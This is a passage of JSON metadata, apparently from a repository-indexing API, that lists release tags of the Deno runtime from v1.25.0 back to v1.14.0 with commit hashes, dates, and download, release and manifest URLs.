/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"h